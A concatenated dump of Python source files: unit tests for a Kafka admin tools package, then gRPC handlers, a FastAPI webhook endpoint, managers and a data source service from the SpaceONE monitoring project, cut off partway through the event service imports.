topic.partitions[1].add_replica(broker2)
topic.partitions[1].add_replica(broker1)
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_topics_from_metadata_delete_replicas(self):
# Don't want to test the broker update code here
broker1 = Broker('host1.example.com', id=1, port=8031)
broker2 = Broker('host2.example.com', id=101, port=8032)
broker3 = Broker('host3.example.com', id=304, port=8033)
topic = Topic('topic1', 2)
self.client.cluster.add_broker(broker1)
self.client.cluster.add_broker(broker2)
self.client.cluster.add_broker(broker3)
self.client.cluster.add_topic(topic)
topic.partitions[0].add_replica(broker2)
topic.partitions[0].add_replica(broker1)
topic.partitions[0].add_replica(broker3)
topic.partitions[1].add_replica(broker2)
topic.partitions[1].add_replica(broker1)
self.client._update_topics_from_metadata(self.metadata_response)
assert_cluster_has_topics(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata(self):
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata_update_rack(self):
broker1 = Broker('host1.example.com', id=1, port=8031)
broker1.rack = 'wrongrack'
self.client.cluster.add_broker(broker1)
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
def test_update_brokers_from_metadata_update_host(self):
broker1 = Broker('wronghost.example.com', id=1, port=8031)
self.client.cluster.add_broker(broker1)
broker1.close = MagicMock()
self.client._update_brokers_from_metadata(self.metadata_response)
assert_cluster_has_brokers(self.client.cluster, self.metadata_response)
broker1.close.assert_called_once()
def test_map_topic_partitions_to_brokers(self):
self.client._update_from_metadata(self.metadata_response)
val = self.client._map_topic_partitions_to_brokers(['topic1'])
assert val == {1: {'topic1': [0]}, 101: {'topic1': [1]}}
def test_map_topic_partitions_to_brokers_nonexistent(self):
self.client._update_from_metadata(self.metadata_response)
self.assertRaises(TopicError, self.client._map_topic_partitions_to_brokers, ['nosuchtopic'])
```
#### File: protocol/requests/test_api_versions_v0.py
```python
import unittest
from tests.tools.protocol.utilities import validate_schema
from kafka.tools.protocol.requests import ArgumentError
from kafka.tools.protocol.requests.api_versions_v0 import ApiVersionsV0Request
class ApiVersionsV0RequestTests(unittest.TestCase):
def test_process_arguments(self):
assert ApiVersionsV0Request.process_arguments([]) == {}
def test_process_arguments_extra(self):
self.assertRaises(ArgumentError, ApiVersionsV0Request.process_arguments, ['foo'])
def test_schema(self):
validate_schema(ApiVersionsV0Request.schema)
```
#### File: tools/protocol/test_main.py
```python
import argparse
import timeout_decorator
import unittest
from mock import patch, MagicMock
from kafka.tools.models.broker import Broker
from kafka.tools.protocol.__main__ import _get_request_classes, _get_request_commands, _print_errors, _parse_command, _cli_loop, main
class TestKlass1:
cmd = "TestKlass"
api_version = 1
class TestKlass2:
cmd = "TestKlass"
api_version = 2
class TestKlassy1:
cmd = "TestKlassy"
api_version = 1
class MainTests(unittest.TestCase):
def setUp(self):
self.broker = Broker('testhost', port=3945)
self.request_classes = {'testklass': {1: TestKlass1, 2: TestKlass2}, 'testklassy': {1: TestKlassy1}}
self.request_cmds = {'testklass': TestKlass2,
'testklassv1': TestKlass1,
'testklassv2': TestKlass2,
'testklassy': TestKlassy1,
'testklassyv1': TestKlassy1}
@patch('kafka.tools.protocol.__main__.get_modules')
def test_get_request_classes(self, mock_modules):
mock_modules.return_value = [TestKlass1, TestKlass2, TestKlassy1]
val = _get_request_classes()
assert val == self.request_classes
def test_get_request_commands(self):
val = _get_request_commands({'testklass': {1: TestKlass1, 2: TestKlass2}, 'testklassy': {1: TestKlassy1}})
print(val)
assert val == self.request_cmds
def test_print_errors(self):
# This just outputs to the console, so just make sure it doesn't fail
_print_errors()
assert True
def test_parse_command_exit(self):
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'exit', [])
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'quit', [])
self.assertRaises(EOFError, _parse_command, self.broker, self.request_classes, self.request_cmds, 'q', [])
@patch('kafka.tools.protocol.__main__.show_help')
def test_parse_command_help(self, mock_help):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'help', [])
mock_help.assert_called_once_with(self.request_classes, self.request_cmds, [])
@patch('kafka.tools.protocol.__main__.show_help')
def test_parse_command_help_pass_args(self, mock_help):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'help', ['foo'])
mock_help.assert_called_once_with(self.request_classes, self.request_cmds, ['foo'])
@patch('kafka.tools.protocol.__main__._print_errors')
def test_parse_command_errors(self, mock_errors):
_parse_command(self.broker, self.request_classes, self.request_cmds, 'errors', [])
mock_errors.assert_called_once_with()
def test_parse_command_unknown(self):
# Should just not raise an error, as it prints out
_parse_command(self.broker, self.request_classes, self.request_cmds, 'unknown_command', [])
assert True
def test_parse_command_request(self):
mock_klass = MagicMock()
mock_broker = MagicMock()
self.request_cmds['testklass'] = mock_klass
self.broker = mock_broker
mock_klass.process_arguments.return_value = 'fake_request_dict'
mock_klass.return_value = 'fake_request'
mock_broker.send.return_value = (8129, 'fake_response')
_parse_command(self.broker, self.request_classes, self.request_cmds, 'testklass', ['someargs'])
mock_klass.process_arguments.assert_called_once_with(['someargs'])
mock_klass.assert_called_once_with('fake_request_dict')
mock_broker.send.assert_called_once_with('fake_request')
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__._parse_command')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_command(self, mock_input, mock_parse, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.side_effect = ['testcommand arg1 arg2', EOFError]
# This will loop twice. First loop should call _parse_command, making sure we pass the args
# Second loop triggers exit
_cli_loop(self.broker)
mock_parse.assert_called_once_with(self.broker, self.request_classes, self.request_cmds, 'testcommand', ['arg1', 'arg2'])
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_exit(self, mock_input, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.return_value = 'exit'
        # This should just exit the loop after one run
_cli_loop(self.broker)
@patch('kafka.tools.protocol.__main__._get_request_classes')
@patch('kafka.tools.protocol.__main__._get_request_commands')
@patch('kafka.tools.protocol.__main__.input')
@timeout_decorator.timeout(5)
def test_cli_loop_empty(self, mock_input, mock_commands, mock_classes):
mock_classes.return_value = self.request_classes
mock_commands.return_value = self.request_cmds
mock_input.side_effect = ['', EOFError]
# This should loop twice. The first loop is the test (empty input), the second triggers an exit of the loop
_cli_loop(self.broker)
@patch('kafka.tools.protocol.__main__._cli_loop')
@patch('kafka.tools.protocol.__main__.set_up_arguments')
@patch('kafka.tools.protocol.__main__.Broker')
def test_main(self, mock_broker, mock_args, mock_cli_loop):
mock_args.return_value = argparse.Namespace(broker='testhost', port=9328)
mock_broker_inst = MagicMock()
mock_broker.return_value = mock_broker_inst
rv = main()
assert rv == 0
mock_args.assert_called_once_with()
mock_broker.assert_called_once_with('testhost', port=9328)
mock_broker_inst.connect.assert_called_once_with()
mock_cli_loop.assert_called_once_with(mock_broker_inst)
mock_broker_inst.close.assert_called_once_with()
```
|
{
"source": "jean1042/monitoring",
"score": 2
}
|
#### File: monitoring/info/webhook_info.py
```python
import functools
from spaceone.api.monitoring.v1 import webhook_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.core import utils
from spaceone.core import config
from spaceone.monitoring.model.webhook_model import Webhook
__all__ = ['WebhookInfo', 'WebhooksInfo']
def PluginInfo(vo):
if vo:
info = {
'plugin_id': vo.plugin_id,
'version': vo.version,
'options': change_struct_type(vo.options),
'metadata': change_struct_type(vo.metadata),
'upgrade_mode': vo.upgrade_mode
}
return webhook_pb2.WebhookPluginInfo(**info)
else:
return None
def WebhookInfo(webhook_vo: Webhook, minimal=False):
if webhook_vo.webhook_url:
webhook_url = f'{config.get_global("WEBHOOK_DOMAIN")}{webhook_vo.webhook_url}'
else:
webhook_url = None
info = {
'webhook_id': webhook_vo.webhook_id,
'name': webhook_vo.name,
'state': webhook_vo.state,
'webhook_url': webhook_url,
'project_id': webhook_vo.project_id
}
if not minimal:
info.update({
'access_key': webhook_vo.access_key,
'capability': change_struct_type(webhook_vo.capability),
'plugin_info': PluginInfo(webhook_vo.plugin_info),
'domain_id': webhook_vo.domain_id,
'created_at': utils.datetime_to_iso8601(webhook_vo.created_at)
})
return webhook_pb2.WebhookInfo(**info)
def WebhooksInfo(webhook_vos, total_count, **kwargs):
return webhook_pb2.WebhooksInfo(results=list(
map(functools.partial(WebhookInfo, **kwargs), webhook_vos)), total_count=total_count)
```
#### File: grpc/v1/alert.py
```python
from spaceone.api.monitoring.v1 import alert_pb2, alert_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Alert(BaseAPI, alert_pb2_grpc.AlertServicer):
pb2 = alert_pb2
pb2_grpc = alert_pb2_grpc
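    # Every RPC below follows the same pattern: parse the request into
    # (params, metadata), resolve AlertService through the locator, and wrap
    # the result in the matching *Info message.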
def create(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.create(params))
def update(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.update(params))
def update_state(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.update_state(params))
def merge(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.merge(params))
def snooze(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.snooze(params))
def add_responder(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.add_responder(params))
def remove_responder(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.remove_responder(params))
def add_project_dependency(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.add_project_dependency(params))
def remove_project_dependency(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.remove_project_dependency(params))
def delete(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
alert_service.delete(params)
return self.locator.get_info('EmptyInfo')
def get(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('AlertInfo', alert_service.get(params))
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
alert_vos, total_count = alert_service.list(params)
return self.locator.get_info('AlertsInfo',
alert_vos,
total_count,
minimal=self.get_minimal(params))
def stat(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('AlertService', metadata) as alert_service:
return self.locator.get_info('StatisticsInfo', alert_service.stat(params))
```
#### File: grpc/v1/metric.py
```python
from spaceone.api.monitoring.v1 import metric_pb2, metric_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Metric(BaseAPI, metric_pb2_grpc.MetricServicer):
pb2 = metric_pb2
pb2_grpc = metric_pb2_grpc
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('MetricService', metadata) as metric_service:
return self.locator.get_info('MetricsInfo', metric_service.list(params))
def get_data(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('MetricService', metadata) as metric_service:
return self.locator.get_info('MetricDataInfo', metric_service.get_data(params))
```
#### File: grpc/v1/note.py
```python
from spaceone.api.monitoring.v1 import note_pb2, note_pb2_grpc
from spaceone.core.pygrpc import BaseAPI
class Note(BaseAPI, note_pb2_grpc.NoteServicer):
pb2 = note_pb2
pb2_grpc = note_pb2_grpc
def create(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.create(params))
def update(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.update(params))
def delete(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
note_service.delete(params)
return self.locator.get_info('EmptyInfo')
def get(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('NoteInfo', note_service.get(params))
def list(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
note_vos, total_count = note_service.list(params)
return self.locator.get_info('NotesInfo',
note_vos,
total_count,
minimal=self.get_minimal(params))
def stat(self, request, context):
params, metadata = self.parse_request(request, context)
with self.locator.get_service('NoteService', metadata) as note_service:
return self.locator.get_info('StatisticsInfo', note_service.stat(params))
```
#### File: rest/v1/event.py
```python
import logging
from fastapi import APIRouter, Request, HTTPException
from spaceone.core.error import *
from spaceone.core.locator import Locator
from spaceone.monitoring.service import EventService
_LOGGER = logging.getLogger(__name__)
router = APIRouter()
@router.post('/webhook/{webhook_id}/{access_key}/events')
async def create_event(webhook_id: str, access_key: str, request: Request):
locator = Locator()
try:
try:
data = await request.json()
except Exception as e:
_LOGGER.debug(f'JSON Parsing Error: {e}')
raise ERROR_UNKNOWN(message='JSON Parsing Error: Request body requires JSON format.')
event_service: EventService = locator.get_service('EventService')
event_service.create({
'webhook_id': webhook_id,
'access_key': access_key,
'data': data or {}
})
return {}
except ERROR_BASE as e:
raise HTTPException(status_code=500, detail=e.message)
except Exception as e:
raise HTTPException(status_code=500, detail=f'Unknown Error: {str(e)}')
```
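A hedged client-side sketch of posting an event to the route above (the host, webhook ID, and access key are placeholders):
```python
import requests  # hypothetical client; any HTTP client works

resp = requests.post(
    'http://monitoring.example.com/webhook/webhook-abc123/my-access-key/events',
    json={'severity': 'CRITICAL', 'title': 'CPU usage high'},  # body must be JSON
)
resp.raise_for_status()  # the handler returns {} on success and HTTP 500 on any error
```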
#### File: monitoring/manager/note_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.monitoring.model.note_model import Note
_LOGGER = logging.getLogger(__name__)
class NoteManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.note_model: Note = self.locator.get_model('Note')
def create_note(self, params):
def _rollback(note_vo):
_LOGGER.info(f'[create_note._rollback] '
f'Delete note : {note_vo.note_id}')
note_vo.delete()
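        # create first, then register the compensating delete so a failed
        # transaction rolls the record back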
note_vo: Note = self.note_model.create(params)
self.transaction.add_rollback(_rollback, note_vo)
return note_vo
def update_note(self, params):
note_vo: Note = self.get_note(params['note_id'], params['domain_id'])
return self.update_note_by_vo(params, note_vo)
def update_note_by_vo(self, params, note_vo):
def _rollback(old_data):
_LOGGER.info(f'[update_note_by_vo._rollback] Revert Data : '
f'{old_data["note_id"]}')
note_vo.update(old_data)
self.transaction.add_rollback(_rollback, note_vo.to_dict())
return note_vo.update(params)
def delete_note(self, note_id, domain_id):
note_vo: Note = self.get_note(note_id, domain_id)
note_vo.delete()
def get_note(self, note_id, domain_id, only=None):
return self.note_model.get(note_id=note_id, domain_id=domain_id, only=only)
    def list_notes(self, query=None):
        return self.note_model.query(**(query or {}))
def stat_notes(self, query):
return self.note_model.stat(**query)
```
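The `_rollback` closures above are what keep `create_note` and `update_note_by_vo` reversible: each mutation registers a compensating action on the transaction before returning. A minimal, framework-free sketch of that pattern (not spaceone's actual transaction implementation) looks like this:
```python
# Minimal sketch of the rollback-stack pattern: compensating callbacks are
# registered during a unit of work and replayed in reverse order on failure.
class MiniTransaction:
    def __init__(self):
        self._rollbacks = []

    def add_rollback(self, fn, *args, **kwargs):
        self._rollbacks.append((fn, args, kwargs))

    def rollback(self):
        for fn, args, kwargs in reversed(self._rollbacks):
            fn(*args, **kwargs)

tx = MiniTransaction()
created = {'note_id': 'note-1'}  # stand-in for a created VO
tx.add_rollback(lambda vo: print(f"delete {vo['note_id']}"), created)
try:
    raise RuntimeError('a later step failed')
except RuntimeError:
    tx.rollback()  # prints: delete note-1
```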
#### File: monitoring/manager/plugin_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.core.connector.space_connector import SpaceConnector
_LOGGER = logging.getLogger(__name__)
class PluginManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.plugin_connector: SpaceConnector = self.locator.get_connector('SpaceConnector', service='plugin')
def get_plugin_endpoint(self, plugin_info, domain_id):
        response = self.plugin_connector.dispatch(
'Plugin.get_plugin_endpoint',
{
'plugin_id': plugin_info['plugin_id'],
'version': plugin_info.get('version'),
'upgrade_mode': plugin_info.get('upgrade_mode', 'AUTO'),
'domain_id': domain_id
}
)
return response['endpoint'], response.get('updated_version')
```
#### File: monitoring/manager/webhook_plugin_manager.py
```python
import logging
from spaceone.core.manager import BaseManager
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.manager.plugin_manager import PluginManager
from spaceone.monitoring.connector.webhook_plugin_connector import WebhookPluginConnector
_LOGGER = logging.getLogger(__name__)
class WebhookPluginManager(BaseManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wp_connector: WebhookPluginConnector = self.locator.get_connector('WebhookPluginConnector')
def initialize(self, endpoint):
_LOGGER.debug(f'[initialize] webhook plugin endpoint: {endpoint}')
self.wp_connector.initialize(endpoint)
def init_plugin(self, options):
plugin_info = self.wp_connector.init(options)
_LOGGER.debug(f'[plugin_info] {plugin_info}')
plugin_metadata = plugin_info.get('metadata', {})
return plugin_metadata
def verify_plugin(self, options):
self.wp_connector.verify(options)
def parse_event(self, options, data):
return self.wp_connector.parse_event(options, data)
def get_webhook_plugin_endpoint_by_vo(self, webhook_vo: Webhook):
plugin_info = webhook_vo.plugin_info.to_dict()
endpoint, updated_version = self.get_webhook_plugin_endpoint(plugin_info, webhook_vo.domain_id)
if updated_version:
_LOGGER.debug(f'[get_webhook_plugin_endpoint_by_vo] upgrade plugin version: {plugin_info["version"]} -> {updated_version}')
self.upgrade_webhook_plugin_version(webhook_vo, endpoint, updated_version)
return endpoint
def get_webhook_plugin_endpoint(self, plugin_info, domain_id):
plugin_mgr: PluginManager = self.locator.get_manager('PluginManager')
return plugin_mgr.get_plugin_endpoint(plugin_info, domain_id)
def upgrade_webhook_plugin_version(self, webhook_vo: Webhook, endpoint, updated_version):
plugin_info = webhook_vo.plugin_info.to_dict()
self.initialize(endpoint)
plugin_metadata = self.init_plugin(plugin_info.get('options', {}))
plugin_info['version'] = updated_version
plugin_info['metadata'] = plugin_metadata
webhook_vo.update({'plugin_info': plugin_info})
```
#### File: monitoring/service/data_source_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.core import cache
from spaceone.core import config
from spaceone.core import utils
from spaceone.monitoring.error import *
from spaceone.monitoring.manager.repository_manager import RepositoryManager
from spaceone.monitoring.manager.secret_manager import SecretManager
from spaceone.monitoring.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.monitoring.manager.data_source_manager import DataSourceManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class DataSourceService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
self.ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['name', 'plugin_info', 'domain_id'])
def register(self, params):
"""Register data source
Args:
params (dict): {
'name': 'str',
'plugin_info': 'dict',
'tags': 'dict',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
domain_id = params['domain_id']
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
self._check_plugin_info(params['plugin_info'])
plugin_info = self._get_plugin(params['plugin_info'], domain_id)
params['capability'] = plugin_info.get('capability', {})
params['provider'] = plugin_info.get('provider')
self._check_plugin_capability(params['capability'])
params['monitoring_type'] = params['capability']['monitoring_type']
# Update metadata
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(params['plugin_info'], domain_id)
if updated_version:
params['plugin_info']['version'] = updated_version
options = params['plugin_info'].get('options', {})
plugin_metadata = self._init_plugin(endpoint, options, params['monitoring_type'])
params['plugin_info']['metadata'] = plugin_metadata
return self.data_source_mgr.register_data_source(params)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def update(self, params):
"""Update data source
Args:
params (dict): {
'data_source_id': 'str',
                'name': 'str',
                'tags': 'dict',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
if 'tags' in params:
params['tags'] = utils.dict_to_tags(params['tags'])
return self.data_source_mgr.update_data_source_by_vo(params, data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def enable(self, params):
""" Enable data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
return self.data_source_mgr.update_data_source_by_vo({'state': 'ENABLED'},
data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def disable(self, params):
""" Disable data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
return self.data_source_mgr.update_data_source_by_vo({'state': 'DISABLED'},
data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def deregister(self, params):
"""Deregister data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.data_source_mgr.deregister_data_source(params['data_source_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def verify_plugin(self, params):
""" Verify data source plugin
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
endpoint = self.ds_plugin_mgr.get_data_source_plugin_endpoint_by_vo(data_source_vo)
self._verify_plugin(endpoint, data_source_vo.plugin_info.to_dict(), data_source_vo.capability, domain_id)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def update_plugin(self, params):
"""Update data source plugin
Args:
params (dict): {
'data_source_id': 'str',
'version': 'str',
'options': 'dict',
'upgrade_mode': 'str',
'domain_id': 'str'
}
Returns:
data_source_vo (object)
"""
data_source_id = params['data_source_id']
domain_id = params['domain_id']
version = params.get('version')
options = params.get('options')
upgrade_mode = params.get('upgrade_mode')
data_source_vo = self.data_source_mgr.get_data_source(data_source_id, domain_id)
plugin_info = data_source_vo.plugin_info.to_dict()
if version:
plugin_info['version'] = version
if options:
plugin_info['options'] = options
if upgrade_mode:
plugin_info['upgrade_mode'] = upgrade_mode
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(plugin_info, domain_id)
if updated_version:
plugin_info['version'] = updated_version
plugin_metadata = self._init_plugin(endpoint, plugin_info.get('options', {}), data_source_vo.monitoring_type)
plugin_info['metadata'] = plugin_metadata
params = {
'plugin_info': plugin_info
}
_LOGGER.debug(f'[update_plugin] {plugin_info}')
return self.data_source_mgr.update_data_source_by_vo(params, data_source_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['data_source_id', 'domain_id'])
def get(self, params):
""" Get data source
Args:
params (dict): {
'data_source_id': 'str',
'domain_id': 'str',
                'only': 'list'
}
Returns:
data_source_vo (object)
"""
domain_id = params['domain_id']
self._initialize_data_sources(domain_id)
return self.data_source_mgr.get_data_source(params['data_source_id'], domain_id, params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['data_source_id', 'name', 'state', 'monitoring_type', 'provider', 'domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['data_source_id', 'name', 'provider'])
def list(self, params):
""" List data sources
Args:
params (dict): {
'data_source_id': 'str',
'name': 'str',
'state': 'str',
'monitoring_type': 'str',
'provider': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
data_source_vos (object)
total_count
"""
domain_id = params['domain_id']
query = params.get('query', {})
self._initialize_data_sources(domain_id)
return self.data_source_mgr.list_data_sources(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@change_tag_filter('tags')
@append_keyword_filter(['data_source_id', 'name', 'provider'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.data_source_mgr.stat_data_sources(query)
@staticmethod
def _check_plugin_capability(capability):
if 'monitoring_type' not in capability:
raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.monitoring_type')
else:
if capability['monitoring_type'] not in ['METRIC', 'LOG']:
raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.monitoring_type')
if 'supported_schema' not in capability:
raise ERROR_WRONG_PLUGIN_SETTINGS(key='capability.supported_schema')
@staticmethod
def _check_plugin_info(plugin_info_params):
if 'plugin_id' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.plugin_id')
if plugin_info_params.get('upgrade_mode', 'AUTO') == 'MANUAL' and 'version' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.version')
secret_id = plugin_info_params.get('secret_id')
provider = plugin_info_params.get('provider')
if secret_id is None and provider is None:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.[secret_id | provider]')
def _get_plugin(self, plugin_info, domain_id):
plugin_id = plugin_info['plugin_id']
repo_mgr: RepositoryManager = self.locator.get_manager('RepositoryManager')
return repo_mgr.get_plugin(plugin_id, domain_id)
def _init_plugin(self, endpoint, options, monitoring_type):
self.ds_plugin_mgr.initialize(endpoint)
return self.ds_plugin_mgr.init_plugin(options, monitoring_type)
def _verify_plugin(self, endpoint, plugin_info, capability, domain_id):
plugin_id = plugin_info['plugin_id']
options = plugin_info.get('options', {})
secret_id = plugin_info.get('secret_id')
provider = plugin_info.get('provider')
secret_mgr: SecretManager = self.locator.get_manager('SecretManager')
secret_data, schema = secret_mgr.get_plugin_secret(plugin_id, secret_id, provider, capability, domain_id)
ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
ds_plugin_mgr.initialize(endpoint)
ds_plugin_mgr.verify_plugin(options, secret_data, schema)
@cache.cacheable(key='init-data-source:{domain_id}', expire=300)
def _initialize_data_sources(self, domain_id):
_LOGGER.debug(f'[_initialize_data_source] domain_id: {domain_id}')
query = {'filter': [{'k': 'domain_id', 'v': domain_id, 'o': 'eq'}]}
data_source_vos, total_count = self.data_source_mgr.list_data_sources(query)
installed_data_sources_ids = [data_source_vo.plugin_info.plugin_id for data_source_vo in data_source_vos]
_LOGGER.debug(f'[_initialize_data_source] Installed Plugins : {installed_data_sources_ids}')
global_conf = config.get_global()
for _data_source in global_conf.get('INSTALLED_DATA_SOURCE_PLUGINS', []):
if _data_source['plugin_info']['plugin_id'] not in installed_data_sources_ids:
try:
_LOGGER.debug(
f'[_initialize_data_source] Create init data source: {_data_source["plugin_info"]["plugin_id"]}')
_data_source['domain_id'] = domain_id
self.register(_data_source)
except Exception as e:
_LOGGER.error(f'[_initialize_data_source] {e}')
return True
```
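Note how `_initialize_data_sources` is guarded by `cache.cacheable` with a per-domain key template and a 300-second TTL, so the default-plugin check runs at most once per domain per interval. The following is an illustrative, simplified re-creation of that decorator idea in plain Python; it is not the `spaceone.core.cache` implementation and only handles keyword arguments:
```python
# Illustrative keyed TTL-cache decorator (simplified; keyword-args only).
import time
import functools

_store = {}

def cacheable(key, expire):
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kwargs):
            # Resolve the key template from keyword arguments, e.g. domain_id.
            cache_key = key.format(**kwargs)
            hit = _store.get(cache_key)
            if hit and hit[1] > time.time():
                return hit[0]
            value = fn(*args, **kwargs)
            _store[cache_key] = (value, time.time() + expire)
            return value
        return wrapper
    return decorator

@cacheable(key='init-data-source:{domain_id}', expire=300)
def initialize(*, domain_id):
    print(f'initializing {domain_id}')
    return True

initialize(domain_id='dom-1')  # runs the body
initialize(domain_id='dom-1')  # served from cache for 300s
```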
#### File: monitoring/service/event_service.py
```python
import logging
import copy
from spaceone.core.service import *
from spaceone.core import utils, cache, config
from spaceone.monitoring.error.webhook import *
